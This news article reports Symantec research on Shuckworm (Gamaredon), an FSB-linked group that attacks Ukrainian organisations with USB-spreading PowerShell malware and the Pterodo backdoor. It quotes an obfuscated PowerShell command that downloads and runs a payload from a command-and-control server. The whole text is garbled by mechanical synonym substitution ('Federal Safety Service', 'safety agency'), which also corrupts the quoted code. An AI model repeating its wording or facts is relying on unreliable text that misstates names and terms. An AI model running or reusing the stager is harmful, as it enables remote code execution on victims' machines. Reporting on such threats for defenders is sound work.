Hackers working for Russia’s Federal Safety Service have mounted a number of cyberattacks that used USB-based malware to steal massive quantities of knowledge from Ukrainian targets to be used in its ongoing invasion of its smaller neighbor, researchers stated.
“The sectors and nature of the organizations and machines focused could have given the attackers entry to vital quantities of delicate data,” researchers from Symantec, now owned by Broadcom, wrote in a Thursday post. “There have been indications in some organizations that the attackers had been on the machines of the organizations’ human sources departments, indicating that details about people working on the varied organizations was a precedence for the attackers, amongst different issues.”
The group, which Symantec tracks as Shuckworm and different researchers name Gamaredon and Armageddon, has been energetic since 2014 and has been linked to Russia’s FSB, the principal safety service in that nation. The group focuses solely on acquiring intelligence on Ukrainian targets. In 2020, researchers at safety agency SentinelOne said the hacking group had “attacked over 5,000 particular person entities throughout the Ukraine, with specific deal with areas the place Ukrainian troops are deployed.”
In February, Shuckworm started deploying new malware and command-and-control infrastructure that has efficiently penetrated the defenses of a number of Ukrainian organizations within the navy, safety companies, and authorities of that nation. Group members appear most fascinated by acquiring data associated to delicate navy data that may very well be abused in Russia’s ongoing invasion.
This newer marketing campaign debuted new malware within the type of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script prompts when contaminated USB drives are linked to focused computer systems. The malicious script first copies itself onto the focused machine to create a shortcut file with the extension rtf.lnk. The recordsdata have names equivalent to video_porn.rtf.lnk, do_not_delete.rtf.lnk, and proof.rtf.lnk. The names, that are principally within the Ukrainian language, are an try to entice targets to open the recordsdata so they’ll set up Pterodo on machines.
The script goes on to enumerate all drives linked to the focused pc and to repeat itself to all connected detachable drives, almost definitely in hopes of infecting any air-gapped gadgets, that are deliberately not linked to the Web in an try to forestall them from being hacked.
To cowl its tracks, Shuckworm has created dozens of variants and quickly rotated the IP addresses and infrastructure it makes use of for command and management. The group additionally makes use of reliable companies equivalent to Telegram and its micro-blogging platform Telegraph for command and management in one other try to keep away from detection.
Shuckworm usually makes use of phishing emails as an preliminary vector into targets’ computer systems. The emails comprise malicious attachments that masquerade as recordsdata with extensions, together with .docx, .rar, .sfx, lnk, and hta. Emails typically use matters equivalent to armed conflicts, prison proceedings, combating crime, and defending kids as lures to get targets to open the emails and click on on the attachments.
Symantec researchers stated that an contaminated pc they recovered within the marketing campaign was typical for the best way it really works. They wrote:
In a single sufferer, the primary signal of malicious exercise was when the consumer appeared to open a RAR archive file that was seemingly delivered by way of a spear-phishing e-mail and which contained a malicious Doc.
After the doc was opened, a malicious PowerShell command was noticed being executed to obtain the next-stage payload from the attackers’ C&C server:
“CSIDL_SYSTEMcmd.exe” /c begin /min “” powershell -w hidden
“$gt=”/get.”+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.advert
dresslist[0];$shopper=(new-object
web.webclient);$faddr=”htt”+’ps://’+$addr+$gt;$textual content=$shopper.downloads
tring($faddr);iex $textual content”Extra not too long ago, Symantec has noticed Shuckworm leveraging extra IP addresses of their PowerShell scripts. That is seemingly an try to evade some monitoring strategies employed by researchers.
Shuckworm additionally continues to replace the obfuscation strategies utilized in its PowerShell scripts in an try to keep away from detection, with as much as 25 new variants of the group’s scripts noticed per thirty days between January and April 2023.
Thursday’s submit consists of IP addresses, hashes, file names, and different indicators of compromise individuals can use to detect if they’ve been focused. The submit additionally warns that the group poses a menace that targets ought to take severely.
“This exercise demonstrates that Shuckworm’s relentless deal with Ukraine continues,” they wrote. “It appears clear that Russian nation-state-backed assault teams proceed to laser in on Ukrainian targets in makes an attempt to seek out information that will probably assist their navy operations.”